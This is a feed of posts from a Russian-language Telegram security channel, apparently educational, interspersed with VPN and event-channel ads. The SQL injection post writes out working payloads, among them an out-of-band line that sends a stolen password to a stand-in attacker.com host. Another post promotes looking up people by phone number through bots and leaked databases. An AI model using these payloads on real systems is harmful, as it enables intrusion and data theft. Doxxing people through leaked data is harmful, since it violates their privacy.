T
Tech Lab
15.07.2026 11:05 · 👁 471
⚡️Надежный VPN за 1р⚡️
🔥Что вы получаете? 🔥
♾Безлимитный трафик на обход белых списков
🆓Пробный период 5 дней за 1 рубль
⚡️Стабильное соединение и быстрые сервера
📺 В подписке до 5 устройств, включая TV
😂Подключение за 30 секунд
✅Включили - и можно не выключать. Просто пользуетесь интернетом так, как привыкли
➡️Подключиться за 30 секунд: @giont_vpn_bot
T
Tech Lab
22.06.2026 11:50 · 👁 1.2K
Tech Lab | Чат | #мемы
T
Tech Lab
22.06.2026 09:01 · 👁 1.1K
В России можно посещать IT-мероприятия хоть каждый день: как оффлайн, так и онлайн
Но где их находить? Как узнавать о них раньше, чем когда все начнут выкладывать фотографии оттуда?
Переходите на канал IT-Мероприятия России. В нём каждый день анонсируются мероприятия со всех городов России
📆 в канале размещаются как онлайн, так и оффлайн мероприятия;
👩💻 можно найти ивенты по любому стеку: программирование, frontend-backend разработка, кибербезопасность, дата-аналитика, osint, devops и другие;
🎙 разнообразные форматы мероприятий: митапы с коллегами по цеху, конференции и вебинары с известными опытными специалистами, форумы и олимпиады от важных представителей индустрии и многое другое
А чтобы не искать по разным форумам и чатам новости о предстоящих ивентах:
🚀 IT-мероприятия России — подписывайся и будь в курсе всех предстоящих мероприятий!
T
Tech Lab
20.06.2026 20:44 · 👁 1.2K
🌐 Виртуальные хосты — «невидимые» сайты на одном сервере. Как их настраивают, находят и взламывают.
Представьте одно здание с разными входами. Так работает веб-сервер с виртуальными хостами: на одном IP и порту живут несколько независимых сайтов. Ваш blog.com и shop.com могут физически быть на одной машине.
🔍 Три способа их различить:
🟢По имени (самый частый) — сервер смотрит на заголовок Host: в запросе и отдаёт нужный сайт.
🟢По IP-адресу — у каждого виртуального хоста свой уникальный IP на одном сервере.
🟢По порту — например, site.com:8080 и site.com:9000 (неудобно для пользователей).
🏢 Особый случай: локальные сети
В корпоративных сетях часто используют внутренние DNS-имена, которых нет в публичном интернете:
⚫️files.corp — файловое хранилище
⚫️wiki.internal — база знаний
⚫️monitor.local — панель мониторинга
Эти ресурсы доступны только изнутри сети. Пользователи даже не задумываются, что обращаются к виртуальным хостам.
В следующем посте разберём практический пример с командной строкой.
Tech Lab
T
Tech Lab
12.05.2026 09:31 · 👁 2K
🔑 JWT: Цифровой паспорт в мире Web, который можно подделать
Когда вы входите в приложение, вам часто выдают не обычную куку, а JSON Web Token (JWT) — компактный и самодостаточный токен, который содержит всю информацию о сессии прямо внутри себя.
🤔 Зачем нужен JWT и как он устроен?
JWT создан для статусlessness — серверу не нужно хранить сессию в памяти. Он просто проверяет подпись токена и верит данным внутри. Токен состоит из трёх частей, разделённых точками:
Header.Payload.Signature
🔵Header (Заголовок): Обычно {"alg": "HS256", "typ": "JWT"}. Указывает алгоритм подписи (HS256, RS256, none) и тип.
🔵Payload (Полезная нагрузка): JSON-объект с утверждениями (claims). Например: {"sub": "user123", "name": "Vasya", "admin": false, "iat": 1516239022}.
🔵Signature (Подпись): Криптографическая подпись, которая гарантирует, что токен не был изменён. Создаётся путём хеширования base64UrlEncode(header) + "." + base64UrlEncode(payload) с использованием секретного ключа (для HS256) или приватного ключа (для RS256).
Пример токена: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
🛡Как защититься? Основные правила
🔵Никогда не доверяйте alg из токена. Жёстко задавайте алгоритм проверки на сервере.
🔵Всегда проверяйте подпись перед чтением payload.
🔵Используйте сложные, случайные секретные ключи для HS256.
🔵Проверяйте все claims в payload: iss (issuer), aud (audience), exp (expiration time). Не используйте none в продакшене.
🔵Храните приватные ключи в безопасности, публичные ключи — в доверенных источниках.
🔵Валидируйте параметр kid, запрещая пути и URL.
💎 Итог: JWT — мощный и удобный стандарт, но его «самодостаточность» — палка о двух концах. Одна ошибка в реализации (доверие заголовку, слабый ключ) превращает цифровой паспорт в легкоподделываемую бумажку, открывая дверь к полному захвату учётной записи.
Tech Lab | Чат | #Основы
T
Tech Lab
10.05.2026 09:25 · 👁 1.9K
🤿 ТВОЯ ПРИВАТНОСТЬ МЕРТВА. Я ПОКАЖУ, КАК ЕЁ ВОСКРЕСИТЬ
📹Первоисточник
Tech Lab | Чат | #Видео
T
Tech Lab
03.05.2026 10:10 · 👁 2.5K
👁 Пробив по номеру в Telegram
Вокруг пробива по телефону в Telegram много мифов, но механика проста: мессенджер показывает совпадения из своей адресной книги и даёт боту доступ ровно к тому, что пользователь сам не закрыл в настройках.Поэтому часть «поиска» — это не магия, а правильно собранные источники.
Сегодня такие инструменты комбинируют несколько вещей:
📌 проверку номера через ботов-агрегаторов;
📌 сопоставление по аватару, username и следам в открытых чатах;
📌 поиск по слитым базам и OSINT-каталогам.
Если настройки приватности слабые — о тебе можно узнать больше, чем ты думаешь.
👉 Полное руководство
Tech Lab | Чат | #Cтатьи
T
Tech Lab
30.04.2026 14:33 · 👁 2.2K
💡 SQL-инъекция: От UNION до кражи данных через DNS
Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак.
🔍 1. UNION-based — когда результат виден
Работает, если данные из запроса выводятся на страницу (список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат.
' UNION SELECT username, password FROM users--
Суть: Крадём данные напрямую из интерфейса.
🎭 2. Blind (Слепая) — когда результат не виден
Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет":
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'--
Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли.
⏱️ 3. Time-based — слепая, но с таймером
Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)--
Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали.
🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход
Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')--
Как работает:
🔵СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.
🔵Для этого она делает DNS-запрос к домену attacker.com.
🔵В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.
🔵Данные украдены.
💎 Итог:
🔵UNION — если виден вывод.
🔵Blind — если есть косвенная реакция.
🔵DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.
🔵Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.
Tech Lab | Чат | #Основы
T
Tech Lab
29.04.2026 13:23 · 👁 1.6K
💣 DDoS-атаки — когда сервис валят толпой
DDoS — логичное продолжение DoS, но уже на другом уровне.
Если DoS — это один источник, то DDoS — это тысячи и миллионы узлов, которые одновременно давят цель, пока она не перестаёт отвечать.
Что важно знать:
📌 Что это такое:
🔴DDoS (Distributed Denial of Service) — распределённая атака, при которой трафик идёт сразу с множества источников: ботнетов, заражённых серверов, IoT-устройств.
📌 Как выглядит:
🔴Запросы летят с тысяч IP из разных стран, сетей и ASN.
🔴В логах это выглядит как «нормальный» трафик, но в ненормальных объёмах.
📌 Почему сложнее защищаться:
🔴Блокировка одного IP не решает ничего.
🔴Нужно фильтровать по поведению, протоколам, типам запросов, а иногда резать целые регионы и подсети.
📌 Какие бывают:
🔴 volumetric — забивают канал (Gbps/Tbps);
🔴 protocol — ломают стек (SYN, UDP, ICMP);
🔴 application-layer — бьют по HTTP/API, имитируя живых пользователей.
📌 Где бьёт больнее всего:
🎯 онлайн-сервисы, банки, игры, маркетплейсы, госресурсы, API без rate-limit.
Короче говоря 🗣:DDoS — это не «сломать», а утопить сервис в трафике.
Код может быть идеальным, но без защиты инфраструктура ляжет первой.
Tech Lab | Чат | #Виды атак
T
Tech Lab
12.04.2026 11:04 · 👁 2.3K
🛡 PatchMon: централизованное управление обновлениями в серверных средах
Инструмент для админов и Blue Team, который позволяет безопасно и централизованно управлять обновлениями на разных серверах. Агенты обмениваются данными с сервером PatchMon только по исходящим каналам — не нужно открывать порты и рисковать.
Что умеет:
➡️Централизованное управление патчами на множестве серверов
➡️Агенты работают через исходящие соединения (без открытых портов)
➡️Полная видимость состояния обновлений
➡️Безопасная автоматизация процессов
🔗 GitHub: PatchMon/PatchMon
VPN за 1₽ | Tech Lab | Чат | #Инструменты